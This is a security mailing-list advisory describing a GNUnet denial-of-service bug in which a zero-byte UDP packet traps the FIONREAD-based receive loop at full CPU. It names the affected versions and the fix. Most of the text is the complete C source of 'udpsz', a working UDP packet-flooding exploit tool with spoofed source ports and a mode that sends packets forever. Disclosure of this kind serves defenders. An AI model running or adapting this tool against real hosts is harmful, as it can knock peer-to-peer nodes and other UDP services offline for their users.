[UNIX] GNUnet DoS (UDP Socket Unreachable)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



GNUnet DoS (UDP Socket Unreachable)
------------------------------------------------------------------------


SUMMARY

" <http://www.gnunet.org> GNUnet is a framework for secure peer-to-peer
networking that does not use any centralized or otherwise trusted
services. A first service implemented on top of the networking layer
allows anonymous censorship-resistant file-sharing."

The asynchronous mode used for the UDP socket is handled through FIONREAD.
If an empty UDP packet (zero bytes) is received the program enters an
endless loop where other UDP packets cannot be handled and the CPU reaches
100% of usage.

DETAILS

Vulnerable Systems:
* GNUnet 0.7.0d and lower
* GNUnet SVN revision 2780 and lower

Immune Systems:
* GNUnet SVN revision 2781

The asynchronous mode used for the UDP socket is handled through FIONREAD.
If an empty UDP packet (zero bytes) is received the program enters an
endless loop where other UDP packets cannot be handled and the CPU reaches
100% of usage.

FIONREAD is used by some programs to handle the data received by sockets
in asynchronous mode. The instructions that use it are made to check the
amount of data in the socket's queue, so the result is ever zero if there
is no new data but if an empty UDP packet (so containing zero bytes of
data) is received the result continue to be ever zero also if in reality
there is new data in the queue... it's logical. The effect is that any
other packet is ignored because the socket's queue can be freed only when
the queued packet is read but is impossible for the program to know if
there is new data (result = 0).

Example:
if(ioctlsocket(sock, FIONREAD, &packet_length)
< 0) socket_error();
if(packet_length) { // or if(packet_length > 0) {
// read socket data (recvfrom)
}

In this example packet_length is the value that contains the "result", so
the current amount of data in the socket's queue. If we receive an empty
UDP packet packet_length will continue to be zero and we will not be able
to read the new packets.
FIONREAD should be NEVER used in connection-less server! Is better to use
the select() or the FIONBIO asynchronous mode. Anyway this bug can be
fixed reading the empty UDP packet when we receive it.

Naturally this problem may exist due to other possible causes but they are
rare or application-specifics, an example is the following:
<http://aluigi.org/adv/lithsock-adv.txt>
http://aluigi.org/adv/lithsock-adv.txt

Exploit Code:
The original exploit code can be found at:
<http://aluigi.org/testz/udpsz.zip> http://aluigi.org/testz/udpsz.zip

/*
Copyright 2006 Luigi Auriemma

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
USA

http://www.gnu.org/licenses/gpl.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <ctype.h>
#include <sys/stat.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#define sleep Sleep
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif

#define VER "0.1"


u_char *load_file(u_char *filename, int *size);
int create_socket(void);
u_char get_byte(u_char *data);
int get_num(u_char *data);
int create_rand_byte(u_char *data, int len, u_int *seed);
u_int resolv(char *host);
void std_err(void);


int main(int argc, char *argv[]) {
struct sockaddr_in peer,
peerl;
u_int seed;
int sd = 0,
i,
size,
randport = 0,
randbyte = 0,
loop = 0,
loopms = 0,
chr = 0;
u_short port,
sport = 0;
u_char *buff,
*filename = NULL;

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

setbuf(stdout, NULL);

fputs("\n"
"UDPSZ "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@xxxxxxxxxxxxx\n"
"web: aluigi.org\n"
"\n", stdout);

if(argc < 4) {
printf("\n"
"Usage: %s [options] <host> <port> <pck_size>\n"
"\n"
"Options:\n"
"-b BYTE fill the packet with byte BYTE, which can be a
char or a hex\n"
" example: -b a or -b 0x61 or -b 61\n"
"-r random packet content\n"
"-s packet filled with incremental byte (use -b for
the start byte)\n"
"-p PORT use source port PORT\n"
"-R random source port\n"
"-S sequential source port\n"
"-f FILE load the content of the packet from FILE, the size
will be\n"
" truncated at pck_size, set it to -1 for using the
file size\n"
"-l MS send infinite packets with a delay of MS
milliseconds\n"
"\n", argv[0]);
exit(1);
}

argc -= 3;
for(i = 1; i < argc; i++) {
switch(argv[i][1]) {
case 'b': chr = get_byte(argv[++i]); break;
case 'r': randbyte = 1; break;
case 's': randbyte = 2; break;
case 'p': sport = get_num(argv[++i]); break;
case 'R': randport = 1; break;
case 'S': randport = 2; break;
case 'l': {
loop = 1;
loopms = get_num(argv[++i]);
} break;
case 'f': filename = argv[++i]; break;
default: {
printf("\nError: wrong command-line argument (%s)\n\n",
argv[i]);
exit(1);
} break;
}
}

port = get_num(argv[argc + 1]);
size = get_num(argv[argc + 2]);

peer.sin_addr.s_addr = resolv(argv[argc]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);

seed = time(NULL);

if(filename) {
buff = load_file(filename, &size);

} else {
buff = malloc(size);
if(!buff) std_err();

if(!randbyte) {
memset(buff, chr, size);
}
}
printf("- packet size: %d\n", size);

if(randport) {
peerl.sin_addr.s_addr = INADDR_ANY;
peerl.sin_port = htons(~seed);
peerl.sin_family = AF_INET;
} else {
sd = create_socket();
}

if(sport && !randport) {
peerl.sin_addr.s_addr = INADDR_ANY;
peerl.sin_port = htons(sport);
peerl.sin_family = AF_INET;
printf("- source port: %hu\n", sport);
if(bind(sd, (struct sockaddr *)&peerl, sizeof(peerl))
< 0) std_err();
}

#ifndef WIN32
loopms *= 1000;
#endif

printf("- send packets: ");
for(;;) {
if(randbyte == 2) {
memset(buff, chr++, size);
} else if(randbyte == 1) {
create_rand_byte(buff, size, &seed);
}
if(randport) {
sd = create_socket();
do {
if(randport == 2) { // sequential
peerl.sin_port = htons(sport++);
} else {
peerl.sin_port += seed; // not really random
}
} while(bind(sd, (struct sockaddr *)&peerl, sizeof(peerl)) <
0);
}

if(sendto(sd, buff, size, 0, (struct sockaddr *)&peer,
sizeof(peer))
< 0) std_err();
fputc('.', stdout);

if(randport) {
close(sd);
}

if(!loop) break;
#ifdef WIN32
sleep(loopms);
#else
usleep(loopms);
#endif
}

if(!randport) {
close(sd);
}
free(buff);
printf("\n- finished\n");
return(0);
}


u_char *load_file(u_char *filename, int *size) {
struct stat xstat;
FILE *fd;
u_char *buff;

printf("- load file: %s\n", filename);
fd = fopen(filename, "rb");
if(!fd) std_err();

fstat(fileno(fd), &xstat);
if((*size < 0) || (*size > xstat.st_size)) {
*size = xstat.st_size;
}

buff = malloc(*size);
if(!buff) std_err();

fread(buff, *size, 1, fd);
fclose(fd);
return(buff);
}

int create_socket(void) {
int sd,
on = 1;

sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on)); //
useful?
return(sd);
}



u_char get_byte(u_char *data) {
int chr;

if(strlen(data) == 1) {
return(data[0]);
}
if(tolower(data[1]) == 'x') {
data += 2;
} else if(tolower(data[0]) == 'x') {
data++;
}
sscanf(data, "%x", &chr);
return(chr);
}

int get_num(u_char *data) {
int num;

if(tolower(data[1]) == 'x') {
sscanf(data + 2, "%x", &num);

} else if(tolower(data[0]) == 'x') {
sscanf(data + 1, "%x", &num);

} else {
sscanf(data, "%d", &num);
}
return(num);
}

int create_rand_byte(u_char *data, int len, u_int *seed) {
u_int rnd;
u_char *p;

rnd = *seed;
p = data;

while(len--) {
rnd = (rnd * 0x343FD) + 0x269EC3;
rnd >>= 3; // useless???
*p++ = rnd & 0xff;
}

*seed = rnd;
return(p - data);
}

u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)hp->h_addr;
}
return(host_ip);
}


#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif


ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/gnunetzero-adv.txt>
http://aluigi.altervista.org/adv/gnunetzero-adv.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NT] Amp II 3D Engine Unreacheable Socket
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... attacker sends an UDP packet of zero bytes to the server, ... int main{ ...
    (Securiteam)
  • [NEWS] Grandstream Budge Tone 101/102 VoIP DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... this by sending a UDP packet larger than 65534 bytes to port 5060. ... print color 'bold blue'; ...
    (Securiteam)
  • [NT] Raknet Denial of Service
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... closed source games like those developed by ... An UDP packet of 0 bytes is able to freeze the game server. ...
    (Securiteam)
  • wrong ip checksum on outgoing udp packets
    ... I am trying to send udp packet through sendtofunction ... int sendto(socketdescr, buffer, buf_len, flags, destination_addr); ...
    (comp.os.vxworks)